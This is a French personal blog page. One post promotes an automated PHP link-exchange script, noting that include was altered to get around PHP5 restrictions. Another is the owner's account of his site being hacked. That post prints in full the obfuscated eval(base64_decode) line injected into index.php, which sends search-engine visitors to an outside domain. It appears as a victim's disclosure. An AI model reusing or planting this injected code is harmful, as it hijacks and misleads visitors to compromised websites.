Avec mon ami Laurent, on avait été parmi les premiers à lancer un programme d'échange de liens en dur automatisés grâce à PHP. Alors que j'avais laissé tombé l'idée il y a déjà de nombreuses années, j'ai remis le programme au goût du jour à la demande de nombreux webmasters.
Pour détourner les restrictions du PHP5, il a fallu changer quelque peu la fonction include et je laisse les webmasters choisir le (ou le groupe) de mots clés sur lesquels ils souhaitent avoir le lien. Cet échange de liens devrait rencontrer un vif succès.
lundi 27 décembre 2010
samedi 4 décembre 2010
www.reportages-photos.fr a été hacké par des ukrainiens
Mon site www.reportages-photos.fr a été hacké par des pirates ukrainiens qui ont ajouté en haut de mon fichier index.php le code suivant :
eval(base64_decode("aWYgKHN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiZ29vZ2xlIikpIHsNCglpZiAoIXN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiLm51IikgYW5kICFzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sInNpdGUiKSBhbmQgIXN0cmlzdHIoJF9TRVJWRVJbSFRUUF9SRUZFUkVSXSwiaW51cmwiKSl7DQoJCXByZWdfbWF0Y2ggKCIvcVw9KC4qKS8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsNCgkJaWYgKHN0cmlzdHIoJGtrWzFdLCImIikpIHsNCgkJCXByZWdfbWF0Y2ggKCIvKC4qPylcJi8iLCRra1sxXSwka2V5Mik7DQoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtleTJbMV0pOw0KCQl9ZWxzZSB7DQoJCQkka2V5d29yZD11cmxkZWNvZGUoJGtrWzFdKTsNCgkJfQ0KCQloZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZ2JlcmJoamVyZmRzLm9zYS5wbC8/cT0iLiRrZXl3b3JkKTsNCgkJZXhpdCgpOw0KCX0NCg0KfWVsc2VpZiAoc3RyaXN0cigkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCJ5YWhvbyIpKSB7DQpwcmVnX21hdGNoICgiL3BcPSguKj8pJi8iLCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sJGtrKTsNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2diZXJiaGplcmZkcy5vc2EucGwvP3E9Ii4ka2tbMV0pOw0KCQlleGl0KCk7DQp9ZWxzZWlmIChzdHJpc3RyKCRfU0VSVkVSW0hUVFBfUkVGRVJFUl0sImJpbmciKSkgew0KcHJlZ19tYXRjaCAoIi9xXD0oLio/KSYvIiwkX1NFUlZFUltIVFRQX1JFRkVSRVJdLCRrayk7DQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9nYmVyYmhqZXJmZHMub3NhLnBsLz9xPSIuJGtrWzFdKTsNCgkJZXhpdCgpOw0KfQ=="));
Ce code redirigeait mon site sur un de leur site internet.
J'ai donc renvoyé le bon fichier sur le serveur, mais mon site est toujours fiché sur www.stopbadware.org et Google affiche ceci à propos de mon site :
Ce site risque d'endommager votre ordinateur.
Inscription à :
Messages (Atom)
